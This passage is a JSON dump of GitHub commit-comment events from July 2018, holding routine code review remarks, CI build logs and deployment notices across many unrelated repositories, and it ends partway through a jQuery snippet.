{"id":"7921710900","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29603013,"position":20,"line":51,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"077ba183ad61d9fbbe81e92113bb866102da46b0","created_at":"2018-07-05T08:28:57Z","updated_at":"2018-07-05T08:28:57Z","author_association":"NONE","body":"All of the URIs will share the same result graph?\r\n\r\nbtw. you will have to make sure that the result graph matches the result graph that is used by the triple store based sink. I am not sure whether this is done at the moment."}},"created_at":"2018-07-05T08:28:57Z"}
{"id":"7921713451","type":"CommitCommentEvent","actor":{"login":"vanhauser-thc"},"repo":{"name":"mmiszczyk/dfuzzer"},"payload":{"comment":{"id":29603017,"position":null,"line":null,"path":null,"commit_id":"5d24a0ff1d64d166a95fea0de7151244f8fb03f2","created_at":"2018-07-05T08:29:25Z","updated_at":"2018-07-05T08:29:25Z","author_association":"NONE","body":"Hey just noticed while looking at your additions:\r\nthe \"case 'L':\" is missing a \"break\" statement and will therefore always hit the exit(1) in default:"}},"created_at":"2018-07-05T08:29:25Z"}
{"id":"7921713672","type":"CommitCommentEvent","actor":{"login":"tomjn"},"repo":{"name":"Varying-Vagrant-Vagrants/VVV"},"payload":{"comment":{"id":29603019,"position":null,"line":null,"path":null,"commit_id":"948fcac66e63caae8bdeb291ec4f93379f59c9f7","created_at":"2018-07-05T08:29:28Z","updated_at":"2018-07-05T08:29:28Z","author_association":"MEMBER","body":"Yes! Feel free to switch, develop is usually rather stable anyway\nOn Wed, 4 Jul 2018 at 08:05, Jeremy Scott <notifications@github.com> wrote:\n\n> So excited to see this! Missing mail testing so much. Is the develop\n> branch complete enough I can start running this?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Varying-Vagrant-Vagrants/VVV/commit/948fcac66e63caae8bdeb291ec4f93379f59c9f7#commitcomment-29590727>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADl5wV3S46Pm3Y-yX7hlMM7yA9SQ4Qcks5uDGkcgaJpZM4VCDoY>\n> .\n>\n"}},"created_at":"2018-07-05T08:29:28Z"}
{"id":"7921713727","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"Mika-5/optimizer-ortools"},"payload":{"comment":{"id":29603020,"position":55,"line":612,"path":"tsp_simple.cc","commit_id":"b54ff9172bbdebe4bc0612c96824904a37053e6e","created_at":"2018-07-05T08:29:29Z","updated_at":"2018-07-05T08:29:29Z","author_association":"NONE","body":"remove std::cout "}},"created_at":"2018-07-05T08:29:29Z"}
{"id":"7921713802","type":"CommitCommentEvent","actor":{"login":"heshamMassoud"},"repo":{"name":"commercetools/commercetools-payone-integration"},"payload":{"comment":{"id":29603021,"position":null,"line":null,"path":null,"commit_id":"6a795bfd7c3281d2dab1de1fa44ba43e912b645c","created_at":"2018-07-05T08:29:30Z","updated_at":"2018-07-05T08:29:30Z","author_association":"MEMBER","body":"please also update javadoc of throws declaration ;)"}},"created_at":"2018-07-05T08:29:30Z"}
{"id":"7921715916","type":"CommitCommentEvent","actor":{"login":"gwleuverink"},"repo":{"name":"UniSharp/laravel-filemanager"},"payload":{"comment":{"id":29603030,"position":4,"line":36,"path":"docs/installation.md","commit_id":"54c73c70150d28c0db9ea190b8cff8c92390b151","created_at":"2018-07-05T08:29:55Z","updated_at":"2018-07-05T08:29:55Z","author_association":"COLLABORATOR","body":"@g0110280 It seems this addition causes problems during installation in v1.8.5 (and presumably lower versions as well). The prefix and middlewares are already set in the config file. Can we omit this part of the docs? See issue #625 "}},"created_at":"2018-07-05T08:29:55Z"}
{"id":"7921717825","type":"CommitCommentEvent","actor":{"login":"heshamMassoud"},"repo":{"name":"commercetools/commercetools-payone-integration"},"payload":{"comment":{"id":29603038,"position":null,"line":null,"path":null,"commit_id":"6a795bfd7c3281d2dab1de1fa44ba43e912b645c","created_at":"2018-07-05T08:30:17Z","updated_at":"2018-07-05T08:30:17Z","author_association":"MEMBER","body":"also please add unit tests for it"}},"created_at":"2018-07-05T08:30:17Z"}
{"id":"7921718831","type":"CommitCommentEvent","actor":{"login":"vtrinkl"},"repo":{"name":"vtrinkl/sample-cloud-native-toolchain-tutorial-20180704121908454"},"payload":{"comment":{"id":29603040,"position":null,"line":null,"path":null,"commit_id":"eca683053253af2e1c384db6cb6358550e04ec23","created_at":"2018-07-05T08:30:28Z","updated_at":"2018-07-05T08:30:28Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/c8fb511f-9f5d-4dc9-b036-1a43f504f05c?env_id=ibm%3Ayp%3Aeu-de \"cloud-native-toolchain-tutorial-20180704121908454\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/2c547be3-345d-4fa5-905f-2044fb07456c?env_id=ibm%3Ayp%3Aeu-de \"sample-cloud-native-toolchain-tutorial-20180704121908454\") deployed [sample-cloud-native-toolchain-tutorial-20180704121908454](https://github.com/vtrinkl/sample-cloud-native-toolchain-tutorial-20180704121908454/releases/tag/deploy-ibm-yp-eu-de-MyOrgaV-test-20180705-083026 \"deploy-ibm-yp-eu-de-MyOrgaV-test-20180705-083026\") to [test](https://console.bluemix.net/apps/8fb2ad2b-5c35-45f3-86e7-1faf425fdccf?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:MyOrgaV:test\"), including this commit"}},"created_at":"2018-07-05T08:30:28Z"}
{"id":"7921719395","type":"CommitCommentEvent","actor":{"login":"purcell"},"repo":{"name":"purcell/emacs.d"},"payload":{"comment":{"id":29603042,"position":null,"line":null,"path":null,"commit_id":"a1cfcc1a7dc043453f3ce08a5618649a62f3664c","created_at":"2018-07-05T08:30:33Z","updated_at":"2018-07-05T08:30:33Z","author_association":"OWNER","body":"Nope, it's not necessary. In certain situations you'd have a `/home/manuel/.stack/global-project/.stack-work/install/x86_64-linux/lts-11.6/8.2.2/bin` directory - I did - and `stack exec` seems to prefer this directory to those in its \"bin-path\", so I found I needed to add the former. If the directory doesn't exist, this should be no problem."}},"created_at":"2018-07-05T08:30:33Z"}
{"id":"7921719886","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29603044,"position":135,"line":225,"path":"src/main/java/org/aksw/simba/squirrel/metadata/CrawlingActivity.java","commit_id":"077ba183ad61d9fbbe81e92113bb866102da46b0","created_at":"2018-07-05T08:30:39Z","updated_at":"2018-07-05T08:30:39Z","author_association":"NONE","body":"Following https://docs.oracle.com/javase/7/docs/api/java/net/URI.html#create(java.lang.String) this method can throw an exception. Your method should take care of that."}},"created_at":"2018-07-05T08:30:39Z"}
{"id":"7921723901","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29603047,"position":44,"line":44,"path":"ruby_module_8/train.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:31:26Z","updated_at":"2018-07-05T08:31:26Z","author_association":"NONE","body":"А почему show? Ведь этот метод пробегается по всем вагонам и будет делать то, что будет передано в блоке, и это никак не ограничивается показыванием.  Чем этот метод является?"}},"created_at":"2018-07-05T08:31:26Z"}
{"id":"7921723975","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"Mika-5/optimizer-ortools"},"payload":{"comment":{"id":29603048,"position":5,"line":357,"path":"tsptw_data_dt.h","commit_id":"b54ff9172bbdebe4bc0612c96824904a37053e6e","created_at":"2018-07-05T08:31:27Z","updated_at":"2018-07-05T08:31:27Z","author_association":"NONE","body":"how do you set 0 to approach or return time ?"}},"created_at":"2018-07-05T08:31:27Z"}
{"id":"7921724016","type":"CommitCommentEvent","actor":{"login":"prudhomm"},"repo":{"name":"feelpp/feelpp"},"payload":{"comment":{"id":29603049,"position":9,"line":186,"path":"contrib/ginac/ginac/CMakeLists.txt","commit_id":"c566e7e11f10772ecdc052920a7b73b39349e079","created_at":"2018-07-05T08:31:28Z","updated_at":"2018-07-05T08:31:28Z","author_association":"MEMBER","body":"it means that python is now a requirement. That's fine by me"}},"created_at":"2018-07-05T08:31:28Z"}
{"id":"7921724563","type":"CommitCommentEvent","actor":{"login":"MichaelRoeder"},"repo":{"name":"varunmaitreya/Squirrel"},"payload":{"comment":{"id":29603052,"position":16,"line":47,"path":"src/main/java/org/aksw/simba/squirrel/metadata/MetaDataHandler.java","commit_id":"077ba183ad61d9fbbe81e92113bb866102da46b0","created_at":"2018-07-05T08:31:34Z","updated_at":"2018-07-05T08:31:34Z","author_association":"NONE","body":"The same holds for your `getUrl` method which can return `null` as well."}},"created_at":"2018-07-05T08:31:34Z"}
{"id":"7921724657","type":"CommitCommentEvent","actor":{"login":"dominikvitt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29603053,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-05T08:31:35Z","updated_at":"2018-07-05T08:31:35Z","author_association":"CONTRIBUTOR","body":"Just checked it.\r\nThere is no difference in survey table structure between surveys imported via lss or tsv file.\r\nSo it looks that it works okay."}},"created_at":"2018-07-05T08:31:35Z"}
{"id":"7921725221","type":"CommitCommentEvent","actor":{"login":"prudhomm"},"repo":{"name":"feelpp/feelpp"},"payload":{"comment":{"id":29603056,"position":4,"line":69,"path":"contrib/ginac/scripts/yaptu.py","commit_id":"c566e7e11f10772ecdc052920a7b73b39349e079","created_at":"2018-07-05T08:31:42Z","updated_at":"2018-07-05T08:31:42Z","author_association":"MEMBER","body":"is that the python 2 vs 3 issue ?"}},"created_at":"2018-07-05T08:31:42Z"}
{"id":"7921728144","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/lawfactory_utils"},"payload":{"comment":{"id":29603064,"position":null,"line":null,"path":null,"commit_id":"6df5aab20dd212e5218d4ed0f1c825738a9d94c8","created_at":"2018-07-05T08:32:18Z","updated_at":"2018-07-05T08:32:18Z","author_association":"CONTRIBUTOR","body":"Ah then I guess it's a specific case because it's a crosslegislature text, but I feel like as they promised, they won't do it for all dossiers of the 14th.\r\nIf I'm correct, I'm not sure we really need to try and handle this specific case as it is properly handled the regular way?"}},"created_at":"2018-07-05T08:32:18Z"}
{"id":"7921729437","type":"CommitCommentEvent","actor":{"login":"akamatagi"},"repo":{"name":"akamatagi/vcg-Automation"},"payload":{"comment":{"id":29603067,"position":null,"line":null,"path":null,"commit_id":"ea9f5a4e6fab0332eb29f981f99ef1def081e20b","created_at":"2018-07-05T08:32:33Z","updated_at":"2018-07-05T08:32:33Z","author_association":"OWNER","body":"Merge the Pull req request #2 "}},"created_at":"2018-07-05T08:32:33Z"}
{"id":"7921729642","type":"CommitCommentEvent","actor":{"login":"DyalogJenkins"},"repo":{"name":"Dyalog/MiServer"},"payload":{"comment":{"id":29603069,"position":null,"line":null,"path":null,"commit_id":"47f7d749583bbdfc2adfe61672ee00c6ee9c3fac","created_at":"2018-07-05T08:32:36Z","updated_at":"2018-07-05T08:32:36Z","author_association":"MEMBER","body":"Build failed with output:\n```SQA failed to initialize\n MiServer for \"/MiServer/MS3\" started on http://172.17.0.3:8080              \n Running in Production mode (configured by setting <Production> in /Config/Se\n                \n       rver.xml)\n \"HandleRequest\" closed socket SRV00000000.CON00000000 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000001 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000002 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000003 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000004 due to error: 1001  ER\n       R_LENGTH    sending response\n \"HandleRequest\" closed socket SRV00000000.CON00000005 due to error: 1001  ER\n       R_LENGTH    sending response\n```"}},"created_at":"2018-07-05T08:32:36Z"}
{"id":"7921729848","type":"CommitCommentEvent","actor":{"login":"dupuchba"},"repo":{"name":"dupuchba/calendar"},"payload":{"comment":{"id":29603071,"position":36,"line":35,"path":"src/calendar/core.clj","commit_id":"564a8c1b2b18e701f7e6a735cf86db27db704065","created_at":"2018-07-05T08:32:38Z","updated_at":"2018-07-05T08:32:38Z","author_association":"OWNER","body":"yes master"}},"created_at":"2018-07-05T08:32:38Z"}
{"id":"7921730777","type":"CommitCommentEvent","actor":{"login":"DrGao"},"repo":{"name":"HduGeek/Basic-web-pentest"},"payload":{"comment":{"id":29603073,"position":null,"line":null,"path":null,"commit_id":"279a71f69f263a038131f2cae836c13ce177eaaa","created_at":"2018-07-05T08:32:49Z","updated_at":"2018-07-05T08:32:49Z","author_association":"NONE","body":"what' the password? thanks\r\n"}},"created_at":"2018-07-05T08:32:49Z"}
{"id":"7921734258","type":"CommitCommentEvent","actor":{"login":"vincentchabannes"},"repo":{"name":"feelpp/feelpp"},"payload":{"comment":{"id":29603081,"position":9,"line":186,"path":"contrib/ginac/ginac/CMakeLists.txt","commit_id":"c566e7e11f10772ecdc052920a7b73b39349e079","created_at":"2018-07-05T08:33:26Z","updated_at":"2018-07-05T08:33:26Z","author_association":"MEMBER","body":"this has been the case since we use ginac.  and it worked if and only if /usr/bin/env python --version give 2.*"}},"created_at":"2018-07-05T08:33:26Z"}
{"id":"7921734415","type":"CommitCommentEvent","actor":{"login":"guilgautier"},"repo":{"name":"guilgautier/DPPy"},"payload":{"comment":{"id":29603084,"position":null,"line":null,"path":null,"commit_id":"d074667fad0e246c81e410f78350d037ac2a580d","created_at":"2018-07-05T08:33:27Z","updated_at":"2018-07-05T08:33:27Z","author_association":"OWNER","body":"I must have a look at it, it seems that since we switched to Public, Travis does not run automatically."}},"created_at":"2018-07-05T08:33:27Z"}
{"id":"7921735469","type":"CommitCommentEvent","actor":{"login":"vtrinkl"},"repo":{"name":"vtrinkl/sample-cloud-native-toolchain-tutorial-20180704121908454"},"payload":{"comment":{"id":29603088,"position":null,"line":null,"path":null,"commit_id":"eca683053253af2e1c384db6cb6358550e04ec23","created_at":"2018-07-05T08:33:40Z","updated_at":"2018-07-05T08:33:40Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/c8fb511f-9f5d-4dc9-b036-1a43f504f05c?env_id=ibm%3Ayp%3Aeu-de \"cloud-native-toolchain-tutorial-20180704121908454\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/2c547be3-345d-4fa5-905f-2044fb07456c?env_id=ibm%3Ayp%3Aeu-de \"sample-cloud-native-toolchain-tutorial-20180704121908454\") deployed [sample-cloud-native-toolchain-tutorial-20180704121908454](https://github.com/vtrinkl/sample-cloud-native-toolchain-tutorial-20180704121908454/releases/tag/deploy-ibm-yp-eu-de-MyOrgaV-prod-20180705-083339 \"deploy-ibm-yp-eu-de-MyOrgaV-prod-20180705-083339\") to [prod](https://console.bluemix.net/apps/831f7bc7-b192-4038-b851-8013c4922165?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:MyOrgaV:prod\"), including this commit"}},"created_at":"2018-07-05T08:33:40Z"}
{"id":"7921736353","type":"CommitCommentEvent","actor":{"login":"vincentchabannes"},"repo":{"name":"feelpp/feelpp"},"payload":{"comment":{"id":29603089,"position":4,"line":69,"path":"contrib/ginac/scripts/yaptu.py","commit_id":"c566e7e11f10772ecdc052920a7b73b39349e079","created_at":"2018-07-05T08:33:51Z","updated_at":"2018-07-05T08:33:51Z","author_association":"MEMBER","body":"it's compatible with v2 and v3"}},"created_at":"2018-07-05T08:33:51Z"}
{"id":"7921736488","type":"CommitCommentEvent","actor":{"login":"purcell"},"repo":{"name":"purcell/emacs.d"},"payload":{"comment":{"id":29603090,"position":null,"line":null,"path":null,"commit_id":"a1cfcc1a7dc043453f3ce08a5618649a62f3664c","created_at":"2018-07-05T08:33:53Z","updated_at":"2018-07-05T08:33:53Z","author_association":"OWNER","body":"BTW, the purpose of all of this was to allow the Emacs modes to use versions of helpers like `hlint`/`hindent`/`dhall` etc. based on the `stack` config for specific projects. So I typically say \"stack build hindent\" to get the `hindent` version appropriate to the current project's Stackage snapshot, and then with this elisp code I can be confident that `hindent.el` will call that specific version of `hindent`."}},"created_at":"2018-07-05T08:33:53Z"}
{"id":"7921743470","type":"CommitCommentEvent","actor":{"login":"rahulkapoorRose"},"repo":{"name":"rahulkapoorRose/GlobalRepo"},"payload":{"comment":{"id":29603105,"position":null,"line":null,"path":null,"commit_id":"3fdcc620ae0d5208dcd74258cde8c948f2dc8e8a","created_at":"2018-07-05T08:35:17Z","updated_at":"2018-07-05T08:35:17Z","author_association":"OWNER","body":">>>>>"}},"created_at":"2018-07-05T08:35:17Z"}
{"id":"7921743903","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29603106,"position":26,"line":26,"path":"ruby_module_8/wagon.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:35:23Z","updated_at":"2018-07-05T08:35:23Z","author_association":"NONE","body":"Из названия не понятно, что этот метод должен делать"}},"created_at":"2018-07-05T08:35:23Z"}
{"id":"7921744330","type":"CommitCommentEvent","actor":{"login":"rahulkapoorRose"},"repo":{"name":"rahulkapoorRose/GlobalRepo"},"payload":{"comment":{"id":29603108,"position":null,"line":null,"path":null,"commit_id":"3fdcc620ae0d5208dcd74258cde8c948f2dc8e8a","created_at":"2018-07-05T08:35:28Z","updated_at":"2018-07-05T08:35:28Z","author_association":"OWNER","body":"tttttt"}},"created_at":"2018-07-05T08:35:28Z"}
{"id":"7921744746","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29603110,"position":8,"line":176,"path":"xwiki-platform-core/xwiki-platform-refactoring/xwiki-platform-refactoring-api/src/main/java/org/xwiki/refactoring/internal/splitter/DefaultDocumentSplitter.java","commit_id":"5939c0f6e896f51bd467714a58d6b5ababbc59b8","created_at":"2018-07-05T08:35:33Z","updated_at":"2018-07-05T08:35:33Z","author_association":"MEMBER","body":"I don't know, all I did is moving that existing code to another method for checkstyle reason but frankly I don't like this if in the first place. Feels like a hack."}},"created_at":"2018-07-05T08:35:33Z"}
{"id":"7921748478","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29603117,"position":30,"line":30,"path":"ruby_module_8/wagon.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:36:18Z","updated_at":"2018-07-05T08:36:18Z","author_association":"NONE","body":"лучше taken_places - что больше отразит суть"}},"created_at":"2018-07-05T08:36:18Z"}
{"id":"7921748649","type":"CommitCommentEvent","actor":{"login":"braktar"},"repo":{"name":"Mika-5/optimizer-api"},"payload":{"comment":{"id":29603118,"position":79,"line":79,"path":"wrappers/cplex.rb","commit_id":"39b8b70b10f3caf50d94f2b045e73c1ec908e120","created_at":"2018-07-05T08:36:20Z","updated_at":"2018-07-05T08:36:20Z","author_association":"NONE","body":"remove empty line"}},"created_at":"2018-07-05T08:36:20Z"}
{"id":"7921753979","type":"CommitCommentEvent","actor":{"login":"michalpristas"},"repo":{"name":"gomods/athens"},"payload":{"comment":{"id":29603153,"position":62,"line":74,"path":"pkg/storage/azurecdn/storage.go","commit_id":"b0186aa81480352e252635f81c0515bff94826ef","created_at":"2018-07-05T08:37:24Z","updated_at":"2018-07-05T08:37:24Z","author_association":"COLLABORATOR","body":"you have numUpload available"}},"created_at":"2018-07-05T08:37:24Z"}
{"id":"7921754104","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29603154,"position":null,"line":null,"path":null,"commit_id":"6e27fb4ad87bb8a8128eac04b2f34bda6356c657","created_at":"2018-07-05T08:37:25Z","updated_at":"2018-07-05T08:37:25Z","author_association":"CONTRIBUTOR","body":"remove, because in real world is really broken!\r\n\r\nerror: failed retrieving file 'python-django-2.0.6-2-any.pkg.tar.xz' from mirror1.artixlinux.org : Maximum file size exceeded\r\nerror: failed retrieving file 'python-django-2.0.6-2-any.pkg.tar.xz' from artix.wheaton.edu : Maximum file size exceeded\r\nerror: failed retrieving file 'python-django-2.0.6-2-any.pkg.tar.xz' from mirror.strits.dk : Maximum file size exceeded\r\nerror: failed retrieving file 'python-django-2.0.6-2-any.pkg.tar.xz' from mirrors.dotsrc.org : Maximum file size exceeded\r\nplus in extra is python-django-2.0.6-1, not 2.0.6-2! mea culpa! sorry!\r\n\r\n\r\n"}},"created_at":"2018-07-05T08:37:25Z"}
{"id":"7921759516","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29603168,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T08:38:30Z","updated_at":"2018-07-05T08:38:30Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |\n|---|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T08:38:30Z"}
{"id":"7921760102","type":"CommitCommentEvent","actor":{"login":"tangweichun"},"repo":{"name":"signal18/replication-manager"},"payload":{"comment":{"id":29603171,"position":null,"line":null,"path":null,"commit_id":"f0b6d597f85584edbb6b050ba68b6aa6d9a2a6b5","created_at":"2018-07-05T08:38:37Z","updated_at":"2018-07-05T08:38:37Z","author_association":"NONE","body":"thank you very much!"}},"created_at":"2018-07-05T08:38:37Z"}
{"id":"7921762042","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29603174,"position":11,"line":11,"path":"ruby_module_8/wagon.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:39:00Z","updated_at":"2018-07-05T08:39:00Z","author_association":"NONE","body":"может назовем place лучше available_space. У нас ведь при создании указываются кол-во \"доступных\" мест/места"}},"created_at":"2018-07-05T08:39:00Z"}
{"id":"7921763573","type":"CommitCommentEvent","actor":{"login":"Android-Star"},"repo":{"name":"Android-Star/HappyDevelop"},"payload":{"comment":{"id":29603176,"position":null,"line":null,"path":null,"commit_id":"b8e105c0cca3c214d34e2be1a71b3041065dbf09","created_at":"2018-07-05T08:39:17Z","updated_at":"2018-07-05T08:39:17Z","author_association":"OWNER","body":"adf"}},"created_at":"2018-07-05T08:39:17Z"}
{"id":"7921764873","type":"CommitCommentEvent","actor":{"login":"BrunoJuchli"},"repo":{"name":"nhibernate/nhibernate-core"},"payload":{"comment":{"id":29603179,"position":null,"line":null,"path":null,"commit_id":"5d77746809f3f9aaaad0ebcf874becef015067ae","created_at":"2018-07-05T08:39:31Z","updated_at":"2018-07-05T08:39:31Z","author_association":"NONE","body":"First, let me start by taking the opportunity to say thanks for all the good work you guys have been doing on NHibernate!\r\n\r\n@fredericDelaporte \r\nI've not found any further info on the plans to make DynamicProxy obsolete other than this commit (which I stumbled upon by accident).\r\nWe're currently using DynamicProxy to add aspects to our entities.\r\n(We use the entities in multiple applications but only in one do we need the additional aspects. Hence we decided they should not be put on the entity class but rather made available specifically on the application that needs the aspects)\r\nI've added an example (see below).\r\n\r\nIs there a migration path or will this feature be dropped?\r\n\r\nExample\r\n---------------\r\n\r\n    public class ViewModelProxyFactory : AbstractProxyFactory\r\n    {\r\n        private static readonly NHibernate.Proxy.DynamicProxy.ProxyFactory Factory = \r\n            new NHibernate.Proxy.DynamicProxy.ProxyFactory();\r\n        private static readonly Type[] AdditionalInterfacesToImplement = {\r\n            typeof(INotifyPropertyChanged),\r\n            typeof(INotifyDataErrorInfo),\r\n            typeof(IExternallyValidatedViewModel)\r\n        };\r\n        \r\n        public override void PostInstantiate(\r\n                        string entityName,\r\n                        Type persistentClass, ISet<Type> interfaces,\r\n                        MethodInfo getIdentifierMethod,\r\n                        MethodInfo setIdentifierMethod,\r\n                        IAbstractComponentType componentIdType)\r\n        {\r\n            var originalPlusAdditionalInterfaces = new HashSet<Type>(\r\n                        interfaces.Concat(AdditionalInterfacesToImplement));\r\n            base.PostInstantiate(\r\n                        entityName, \r\n                        persistentClass, \r\n                        originalPlusAdditionalInterfaces, \r\n                        getIdentifierMethod, \r\n                        setIdentifierMethod, \r\n                        componentIdType);\r\n        }\r\n\r\n        public override INHibernateProxy GetProxy(object id, ISessionImplementor session)\r\n        {\r\n            ViewModelLazyInitializer initializer = this.CreatePropertyChangedLazyInitializer(id, session);\r\n            return Factory.CreateProxy(this.PersistentClass, initializer, this.Interfaces);\r\n        }\r\n    }\r\n\r\n    [Serializable]\r\n    public class ViewModelLazyInitializer : DefaultLazyInitializer, IInterceptor\r\n    {\r\n        private readonly IInterceptor interceptor;\r\n\r\n        public ViewModelLazyInitializer(\r\n            string entityName,\r\n            Type persistentClass,\r\n            object id,\r\n            MethodInfo getIdentifierMethod,\r\n            MethodInfo setIdentifierMethod,\r\n            IAbstractComponentType componentIdType,\r\n            ISessionImplementor session)\r\n            : base(entityName, persistentClass, id, getIdentifierMethod, setIdentifierMethod, componentIdType, session, false)\r\n        {\r\n            this.interceptor = new ViewModelInterceptor(info => base.Intercept(info));\r\n        }\r\n\r\n        public virtual new object Intercept(InvocationInfo info)\r\n        {\r\n            return this.interceptor.Intercept(info);\r\n        }\r\n    }\r\n\r\nNote: Implementation of `ViewModelInterceptor` omitted for brevity."}},"created_at":"2018-07-05T08:39:31Z"}
{"id":"7921765234","type":"CommitCommentEvent","actor":{"login":"Thorin-Oakenpants"},"repo":{"name":"ghacksuserjs/ghacks-user.js"},"payload":{"comment":{"id":29603181,"position":null,"line":null,"path":null,"commit_id":"70abeda9d495edd72d5ca580233af17994e9ba49","created_at":"2018-07-05T08:39:36Z","updated_at":"2018-07-05T08:39:36Z","author_association":"MEMBER","body":"I think we should also fix the info to show the range. the pref says it was introduced in 51. So something like (and similar for 2730)\r\n\r\n```\r\n* [NOTE] For FF51-FF60 (ESR not included), if Storage API is enabled, then Offline Cache (2730) must be also be enabled\r\n``\r\n\r\nand flip 2730 back to enforced false\r\n\r\n^^ does this sound good."}},"created_at":"2018-07-05T08:39:36Z"}
{"id":"7921767452","type":"CommitCommentEvent","actor":{"login":"michalpristas"},"repo":{"name":"gomods/athens"},"payload":{"comment":{"id":29603184,"position":49,"line":69,"path":"pkg/storage/azurecdn/storage.go","commit_id":"b0186aa81480352e252635f81c0515bff94826ef","created_at":"2018-07-05T08:40:02Z","updated_at":"2018-07-05T08:40:02Z","author_association":"COLLABORATOR","body":"i dont see it here, can you make sure ctx.WithTimeout is passed?"}},"created_at":"2018-07-05T08:40:02Z"}
{"id":"7921770888","type":"CommitCommentEvent","actor":{"login":"Praddby"},"repo":{"name":"Praddby/LearningLanguageWithFlashcards"},"payload":{"comment":{"id":29603191,"position":16,"line":16,"path":"database/seeds/RolesSeeder.php","commit_id":"a5e557cde879287464ea4e42285ac35e07722cf8","created_at":"2018-07-05T08:40:43Z","updated_at":"2018-07-05T08:40:43Z","author_association":"OWNER","body":":))) Тестил по верх своих ролей, добавил 1, что отличались, забыл удалить ("}},"created_at":"2018-07-05T08:40:43Z"}
{"id":"7921773616","type":"CommitCommentEvent","actor":{"login":"wyp110lq"},"repo":{"name":"wyp110lq/sofahome"},"payload":{"comment":{"id":29603198,"position":null,"line":null,"path":null,"commit_id":"dcf69da1b12eb8b1dd6eb4ba665c962cb67f3292","created_at":"2018-07-05T08:41:15Z","updated_at":"2018-07-05T08:41:15Z","author_association":"OWNER","body":"pash"}},"created_at":"2018-07-05T08:41:15Z"}
{"id":"7921776275","type":"CommitCommentEvent","actor":{"login":"egli"},"repo":{"name":"sbsdev/pipeline"},"payload":{"comment":{"id":29603207,"position":6,"line":21,"path":".gitignore","commit_id":"6d6ee0b355098903744bd9b0e774dac8a810e49f","created_at":"2018-07-05T08:41:45Z","updated_at":"2018-07-05T08:41:45Z","author_association":"MEMBER","body":"No idea. I guess I had these directories lying around and just put them in gitignore. No idea where they came from and how they were created. Should I remove them from gitignore?"}},"created_at":"2018-07-05T08:41:45Z"}
{"id":"7921779342","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"hocus2pocus/study_projects"},"payload":{"comment":{"id":29603212,"position":23,"line":23,"path":"ruby_module_8/wagon.rb","commit_id":"1a2f7284d21cae00b313a5547da33f71282e2136","created_at":"2018-07-05T08:42:20Z","updated_at":"2018-07-05T08:42:20Z","author_association":"NONE","body":"Этот метод для меня обрел смысл, когда я в голове переименовал @place на @available_space. До этого, я понятия не имел, что тут происходит"}},"created_at":"2018-07-05T08:42:20Z"}
{"id":"7921779743","type":"CommitCommentEvent","actor":{"login":"Doncoe4christ"},"repo":{"name":"udacity/project-pixel-art-maker-starter"},"payload":{"comment":{"id":29603213,"position":1,"line":1,"path":"designs.js","commit_id":"b9ca1056c4c45330b6c78fa76451be9985d2d2e4","created_at":"2018-07-05T08:42:25Z","updated_at":"2018-07-05T08:42:25Z","author_association":"NONE","body":"$(document).ready(function() {\r\n    $('#sizePicker').submit(function makeGrid(grid) {\r\n        $('table tr').remove();\r\n        var rows = $('#input_height').val();\r\n        var cols = $('#input_width').val();\r\n        for (var i = 1; <= rows; i++) {\r\n            $('table').append('<tr></tr>');\r\n            for (var j = 1; j <= cols; j++) {\r\n                $('tr:last').append('<td></td>');\r\n                $('td').attr(\"class\", 'cells');\r\n            }\r\n        }  \r\n        grid.preventDefault();  \r\n        $('.cells').click(function(event){\r\n            var paint 